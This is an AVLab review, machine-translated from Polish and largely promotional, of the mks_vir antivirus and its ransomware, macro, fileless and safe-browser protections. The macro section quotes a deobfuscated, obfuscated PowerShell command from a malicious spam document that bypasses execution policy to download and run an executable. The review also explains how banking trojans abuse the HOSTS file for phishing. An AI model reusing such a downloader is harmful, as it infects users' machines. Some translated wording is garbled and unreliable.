The MKS_VIR antivirus will protect you for the next 500 years

Developer: Arcabit
Product name: mks_vir
Tested version: Dla firm i konsumentów
SRP price: ~135zł


MKS_VIR without a shadow of a doubt can be used to really secure end devices - from government computers, public institutions, schools and universities to private business of any size. The Arcabit solution in the scope of the GDPR Act provides modules that meet the requirements for securing and storing personal data.

Editor's opinion


The older generation of administrators certainly remembers the mks_vir antivirus program. These were the times of Windows 95, 98 and XP, and earlier MS-DOS, under which we played in Prehistoryka and the first version of Prince of Persia. The history of truly Polish antivirus software begins at the end of the century, although actually mks_vir gained popularity only at the turn of the 20th century. At that time, Pentium MMX processors hosted on our desks, a few dozen MB of RAM was enough for computers, the dream was a Voodoo graphics card with a 3D graphics accelerator, and most problems with the system were resolved in the format c:/q known as the amen command. Not many people heard about CDs at that time. The 3.5-inch media were widespread. Anyway, on such a floppy disk, the first versions of the mks_vir installer for the MS-DOS system with embedded signatures and a lexicon of viruses were delivered. And just - computer viruses appeared a dozen or so in the whole year.

mks_vir antywirus

It was easiest to catch the malware by installing games from the bazaar or from carriers borrowed from a buddy. Despite this, the then anti-virus industry is very similar today, where almost all virus analysis operations are automated in the cloud. And really, it's all about the same thing, that is, about protecting computer systems, without which it is almost impossible to run a business.

The first working version of the mks_vir program was created in 1987. It is known - then the programs were served only from the command line or using the keyboard in a simple graphical mode. It was not until 11 years later that mks_vir got the first graphic design, and because Windows 98 was getting more and more popular, it was necessary to prepare the graphic mode.

The graphic design of the mks_vir antivirus was done by Mr. Andrzej Pągowski, a graphic designer known for posters announcing theatrical plays, films, festivals and song contests:

mks_vir wczesna wersja

In 2007, the first version of mks_vir for the 64-bit operating system was released. At the same time, Microsoft made Windows available to Vista, hence the decision to prepare an anti-virus supporting the 64-bit architecture of the system was obvious.

In the following years, we observed the decline of the mks_vir antivirus and it seemed that the times when the mks_vir brand was one of the most recognizable security programs on the Polish market (with 18% of shares) will never come back. Fortunately, it did not happen. All rights to the mks_vir brand went to the Arcabit company from Warsaw. The program was reactivated again in 2012, but something went wrong, because soon after the premiere mks_vir was withdrawn from sale.

2016 has heralded a whole new era. Under the new president, Arcabit reactivated the brand and made the program available in the form of an online antivirus scanner with a phoenix graphic design symbolizing the rebirth:

mks_vir skaner online feniks

Probably by this decision the company's management prepared users for something bigger. Still in April 2018, we received an early version for the first non-public inspection. And since the anti-virus received a refreshed graphic design, the normal decision was to improve the mks_vir online scanner, which visually very quickly became similar to a full-fledged protection package.

mks_vir skaner online nowy

After two long years, the anti-virus project mks_vir, prepared from the marketing and user side, is back and is better than ever before. If you have been missing Arcabit or mks_vir for some reason, just do not do it anymore. As Stanisław Jachowicz wrote in the 19th century - "You praise someone you do not know your own. You do not know what you have."

mks_vir 2008

MKS_VIR for protection against ransomware

We have already written a lot about ransomware, or malware that encrypts files and extorts the ransom. In this respect, we have a lot of experience, as in testing. Yes, "The great test of home and business software for protection against krypto-ransomware" is not the newest one (we will soon prepare a refreshed version with improved algorithms), but it still contains up-to-date information, as it describes the manufacturer's commitment to secure user data against encryption documents, databases, source files and others.

And how does mks_vir do it and why do we think it is probably the best? The words from the Romantic period quoted earlier acquire a deeper meaning in justification.

mks_vir Safe Storage

For now, let's look at the ransomware as an "ordinary" type of malware. Protection in the mks_vir package is carried out by proprietary antivirus technologies developed by Arcabit. We have a heuristic antivirus engine, two-way firewall, a great blocker of macroviruses and fileless viruses. And what if something fails and the ransomware will encrypt user data? The engineers from the Warsaw company assumed that the security software would eventually fail, that's why they developed the Safe Storage mechanism.

Safe Storage is an innovative Arcabit technology that allows you to protect your important data. In practice, it is an encrypted storage on a computer disk in which files are backed up during modification, recording or deletion (accidental or intentional).

Safe Storage requires a more detailed explanation, because it is not a typical backup module - this was not the assumption. The idea that created this mechanism guided the protection of important data (various types of documents, graphic files, databases, sheets, etc.) against unauthorized modification, encryption, destruction or deletion by malicious software, as well as by unintentional user action. You can instantly restore lost files with just a few mouse clicks.

By expanding the availability of this technology to modern realities, you can be impressed (and rightly) that Safe Storage is suitable wherever important information containing personal data, intellectual property or simply files that are necessary for running a business are stored. The mechanism is particularly important in the context of the EU RODO Regulation (GDPR), ie the provisions on the protection of personal data.

The effectiveness of Safe Storage confirms the opinions of satisfied customers, including business circles, for which Safe Storage technology has been adapted so that data can be restored even on mapped network drives. In the home environment, Safe Storage works in the same way, protecting almost all files on a NAS network drive against encryption - almost all, because there are some limitations for some large file types (like video files).

safe storage mechanizm działania

The principle of Safe Storage is very simple. Well, when the "behavioral monitor notices" that some process is trying to modify the file, then the mks_vir antivirus will immediately create an encrypted backup. Regardless of whether the file will be encrypted, changed or deleted, you will be able to recover the data directly in the anti-virus application in the Safe Storage tab. Of course, it does not matter if the file is deleted as a result of ransomware or user's fault. We've tested it many times. It works, that's why we sincerely recommend.

MKS_VIR for protection against script and fileless viruses

In one of the tests we performed, we checked whether current anti-viruses deal with detecting and blocking fileless viruses. Good results obtained by the Arcabit solution allowed to award the best "BEST +++" recommendation from AVLab. Again, Polish engineers outsmarted advanced malware samples that are often used in ATP attacks (Advanced Persident Threat) carried out on high-level employees.

Fileless malware can gain access to the "ring-0" permissions. The process running at this level executes the code with the kernel system privileges. As a result, it can get unlimited access to all processes, drivers and services. You can learn more about fileless viruses by reading "The great test for protection against fileless viruses".

Mks_vir products use the same technology that is implemented in Arcabit antivirus solutions. Fileless fileless viruses work directly in the computer's operating memory. If the virus is not a file but a set of instructions to execute, operating initially on the system's PowerShell or CMD shell interpreter, its detection in the initial phase may be difficult for some manufacturers if they have not developed a mechanism to detect this infection vector.

mks_vir blokowanie aktywnosci sieciowej

In the anti-virus mks_vir this was solved in a different way. Powershell.exe, cmd.exe, wscript.exe, cscript.exe, wmi.exe (as well as others) - are very often used by malware, and almost at all by the user when working in an office editor or in a browser. The mks_vir protection software simply blocks Internet connections for all unsigned trusted files. Arcabit engineers have taken the gloves and probably now they are winning with the authors of malware. Based on the statistics provided by Arcabit, we learned that thanks to this one "trick", the products of the Warsaw company (for home and business) can block up to 99% of malware samples.

MKS_VIR to protect against spam and macroviruses

Does the picture below remind you of something? Certainly. This is a malicious document containing instructions in VBA. Such messages flow to inboxes every day, but it is really easy to protect yourself from them. How?


Good protection against macroviruses should have been characterized for a long time by a reputable antivirus program. If you look at the work environment even more widely, the mks_vir software is in principle a preventive form of protection against the "accidental" launching of macro commands.

Let's look at this specific example of this spam sample. After activating the macro, the following command is executed in the console (usually it is strongly debugged), therefore the following command has been presented in a decrypted form:

cmd /c"pOWErSheLl -nopRoFi -WIn hiDdeN -NOLo -NOnInteRA -eXeCUTIoNp bYpass "$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDERpATh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLoaDFilE.iNVoKE(\"\",\"$Des\7704983.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\7704983.exe"

First, we deal with the CMD interpreter, which activates PowerShell with the parameter executionpolicy bypass, which allows to download from the domain untrusted 7704983.exe file and run it. Something like this should not be done by any Excel file (unless at the special request of the user who has programmed the macros), and this is just one of a dozen ways to bypass the restrictions imposed by Microsoft on PowerShell. The mks_vir antivirus blocks attempts to run such scripts because it treats them as malicious. This is very good news, because this is the simple way to prevent an "accidental" attempt to infect the system.

This is not all that the manufacturer has to offer in blocking malicious software. An additional component of protection is the blocking of JavaScript scripts that are included in e-mail messages.

mks_vir antyspam

Script viruses, macro viruses and various types of malware (especially downloaders) should not do any harm to the system, which is protected by the mks_vir antivirus.

In the presented example we deal with the most common cases of encrypting files by ransomware or by infecting the system with a banking Trojan. The mks_vir software has the right patents for it. Effective patents. And as macroviruses grow from year to year, it is for this reason that mks_vir is recommended to be installed for non-technical users, and wherever effective protection against spam is required, as well as in a work environment where there is concern about encrypting files - for example on computers in accounting departments and in micro and small businesses. It is computers in this sector of enterprises that are the most exposed to infection, because they often store the only copies of important files, thanks to which it is possible to maintain business continuity.

MKS_VIR to perform online transfers

Well, protection mks_vir somehow proved to be ineffective and we do not even know that we have an infected computer with a banking Trojan. For example, such. What's more, malware has changed the HOSTS file in such a way that it will redirect the user to the fake bank website at Despite this, we want to make an online transfer. What we do? We're opening the browser, but not the default one, our favorite one, but the one built into the mks_vir antivirus. The mks_vir browser Safe Browser is dedicated to online transfers.

mks_vir bezpieczna przeglądarka

Mks_vir Safe Browser works closely with the other modules of the mks_vir package. When the module is active, it constantly monitors the system's security level, preventing situations in which very important data for the user could fall into the wrong hands.

Preventive protection of the working environment is probably pioneering. Let's look at how the safe browser mks_vir Safe Browser works:

mks_vir bezpieczna przegladarka

The banking Trojan has modified the HOST file which is located in the c:\Windows\system32\etc\hosts location. HOSTS is a computer file used by the operating system to map host names to IP addresses. By adding the IP address ( and domain ( to the file, we can redirect the browser from the real bank site to false - visually the same but located on another server - then carry out a phishing attack and redirect the user back to the real website . Banks and better online stores use the SSL certificate OV (Organization Validation) with extended validation, which certifies the identity of the entity. The issue of such a certificate for a domain must be verified in advance by the appropriate authority. It is also a much more expensive option than DV (Domain Validation) type SSL certificates. The offender can use the SSL free SSL certificate to buy his own for several dozen zlotys. Therefore, the HTTPS protocol does not provide protection against loss of money. But this is not a problem for the mks_vir antivirus to recognize the modified HOSTS file.

What if the banking Trojan will be in the computer's memory and will try to intercept keyboard keys or stick boxes to a real banking page? The manufacturer has used tactics based on "white lists" of processes that can work with the active browser window mks_vir Safe Browser. This protection method is very effective because it checks the running processes before turning on a secure browser. Some of them may be harmful and work in secret, deceiving antivirus protection, that's why mks_vir once again outweighed the malware authors and displays processes that are not defined by the manufacturer as trusted. The decision which of them should be closed and which does not belong to the user.

mks_vir bezpieczna przegladarka

Anything on the list should be treated as potentially dangerous. Once mks_vir has found no contraindications, it will connect to the bank's website:

mks_vir bezpieczna przegladarka

MKS for domestic companies and public institutions

It can not be concealed that in their best years mks_vir software dominated on company computers. Today, when a few months ago the world went round about the alleged (and never proven) attempt to spy on computers with installed Kaspersky Lab software, Polish private companies, and in particular public benefit institutions should support local producers' solutions. It is true that there is no statutory obligation to choose a solution developed in our country, and the more so the Polish law does not specify how to conduct public institutions in the event of accusations of breach of security by their software provider. In this regard, we recommend reading "Kaspersky Lab and the Polish case" by Andrzej Gontarz at

Even 5 years ago, we had only one manufacturer operating in the area of ​​corporate computer security with the support of the central management console, hence there was not much to choose from. It is worth mentioning that Polish producers of very good software for monitoring and managing the IT environment, as well as producers of specialized SIEM solutions that meet the standards of KNF, GIODO, ISO and others, we have, but when it comes to the narrow antivirus industry, it's Arcabit competition actually he has none. Of course, more technical Readers will surely know the Polish SpyShelter product, which is much more popular abroad. The problem is that SpyShelter is not suitable for environments where administrators would like to manage alerts and protect remotely. SpyShelter does not have such a console, but it is not a typical antivirus - it is a little more difficult to use, although protection ensures a world-class, high level.

The Arcabit company began its activity at a time when the first computer viruses began to appear. Reactivation of the mks_vir brand will allow to gain a larger group of satisfied customers and convince Polish antivirus software. The benefits of this bilateral transaction will be felt by both parties. More income for the producer means more investments in product development and adapting the solution to the changing regulations and trends in IT.

Mks_vir is suitable for most Polish companies, which in the overwhelming majority are micro and small entrepreneurs with one to several hundred computers that need to be secured. And here mks_vir can see his second (or maybe third) chance. And let's not forget about the public sector, healthcare, schools and universities, or strategic state-owned companies in Poland.

We asked the president of Arcabit Sp. Z o. O. Regarding the reactivation of mks_vir. z o.o. and mks_vir Sp. z o.o., Grzegorz Michałek:

mks_vir is one of the undisputed icons of Polish computer science. In times of its former glory, mks_vir was a synonym of anti-virus in our country. We have long wondered how, after many years, it would approach the subject of the brand's reactivation both in the light of its history and contemporary realities of cybersecurity. Discussions in this area were very turbulent and concerned both image issues (as in the case of logotype modernization), commercial (ie, target groups to which we would like first to direct a new product) and very technical (scope of supported systems, implemented function and selection of technology). The company employs people who once created old versions of the mks_vir program as well as employees (also generations) of the "new", looking at the reactivation of the program only from today's point of view. This "clash" has allowed us to develop a vision of a product that continues the old traditions and successfully meets the requirements of modern computer security.

By using modern nomenclature, the new mks_vir is a package of the type of Internet Security or Endpoint Security (i.e. Internet Security with the ability to manage from the level of advanced administration console). We decided not to multiply many technical and functional variants, offering to all recipient groups a complete scope of protection, of course with full possibility of configuring the operating modes of individual security modules. At the same time, we decided not to succumb to the "cutting off" trends of older operating systems (Windows XP, Windows Vista) and the new mks_vir supports and protects all system versions from Windows XP to Windows Server 2016 and Android devices (a detailed list of system requirements is available on the website ). Analyzing various target groups, we have prepared an offer divided into three categories - "Business", "Home and small business", "Public sector and education". Each category contains packages tailored to the requirements of customers and users from individual groups. The new mks_vir before the premiere aroused great interest in the institutions from the Polish public sector, mainly because there is a growing need to protect our home institutions and companies with trusted Polish solutions. Nevertheless, new regulations regarding data protection requirements are also of great importance - mks_vir works perfectly here, offering - apart from a wide range of protection modules - additional functions enhancing data security - encrypted drives, a proven SafeStorage mechanism, a secure browser, a backup module, etc.

We were particularly committed to developing an offer for Polish education. Packages mks_vir School 50 and mks_vir School 100 will allow safe work and education in educational institutions, protecting students and employees from malware, attacks and unwanted content (the package includes an advanced parental control module).

To manage installations of the mks_vir package and network security, we have prepared an advanced mks_vir Administrator module with a functional console.

It is also worth mentioning that our antivirus laboratory constantly develops the scanning mechanisms by supplementing them with procedures detecting all new types of threats. This is particularly important both in the context of new attack vectors and in the light of the renaissance of threats that have already been "shelved" by many manufacturers - cybercriminals again reach for macros of Office packages, for scripts, etc. We are on this topic on a regular basis.

Privately, I can say that I am very happy that one of the most-recognized software brands comes back to the game and will again effectively protect Polish computers.

Malware Protection Test in the wild

On the occasion of the mks_vir review, there could be no security test. We used the system developed by us based on Ubuntu, which we use to carry out automated tests in Windows 10. For the test we used 452 samples of malware, which came from our honeypots, or traps, whose main task is simulating the Windows environment, capture information about attacks for various services issued to the Internet (eg HTTP server, HTTPS, FTP, SMB, MySQL and others), including collecting malware samples. And among them were various varieties of ransomware, Trojans, cryptocurrency excavators, Internet worms and backdoors.

The map below shows the current location of our honeypots:

honeypoty AVLab

Viruses before the test have been thoroughly tested and analyzed. We need to be sure that only "100-percent" harmful samples will be allowed for testing. The situation, when the malware will not work in the system, because it has been programmed for another geographical region, will never happen in our tests. Thanks to this, the readers and manufacturers are sure that the malware that has been qualified for the study is able to seriously infect the operating system regardless of which part of the world it comes from.

After the test, all malware checksums were provided to the manufacturer for verification. Readers who are particularly interested in testing and security are included in the checksums of all 452 malware samples.

Test results

The mks_vir antivirus was characterized by a very high level of protection during the test, stopping all 452 threats. If we take into account that the test used samples that in most recent months create the most problems (ransomware, cryptocurrency excavators, downloaders), mks_vir due to a different approach to blocking viruses is able to stop even such malicious software that would outsmart an antivirus engine.

Mks_vir software is recommended to users to protect the system and data from the entire spectrum of malware - from banking Trojans, macro viruses and ransomware. For a small price, the license buyer receives almost unbreakable protection. Otherwise, it will be an interesting experience if we know the opinion of the user who is dissatisfied with the protection of Arcabit products.

MKS_VIR for GDPR with encrypted disks

The return to the antivirus market mks_vir is one of the most important information this year in the industry in our country. After long years of absence, the mks_vir brand was finally resurrected by rubbing nose competition with proprietary and even pioneering technological solutions that have been integrated with Arcabit products. The mks_vir brand still enjoys a special interest among the older generation of administrators, but they do not have to feed on sentiments.

At the moment, the mks_vir antivirus can be used without any shadow of a doubt to really protect end devices - from government computers, public institutions, schools and universities to private business of any size. The Arcabit solution in the scope of the RODO Act provides modules that meet the requirements of securing and storing personal data: the mentioned Safe Storage mechanism will not allow accidental loss of files containing sensitive information, while the module for creating encrypted disks will store selected data and directories in a password protected warehouse.

The mks_vir antivirus can be tested for 30 days by downloading the installer from the website. Companies can apply for an additional test period, which can be extended upon a special request.

Competition for readers

If you have read the review from cover to cover, one of the 10 licenses of mks_vir can reach you. Just read the regulations and comment on the topic below:

mks_vir sometime and today - my past experiences with the mks_vir program and expectations related to the new version of the program.

We are waiting for the competition's comments until 18 May.

We respect the privacy of our readers, therefore we do not log their activities. In order for us to contact the winners, please fill in the E-MAIL field when answering. This field is visible only to the administrator.

Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.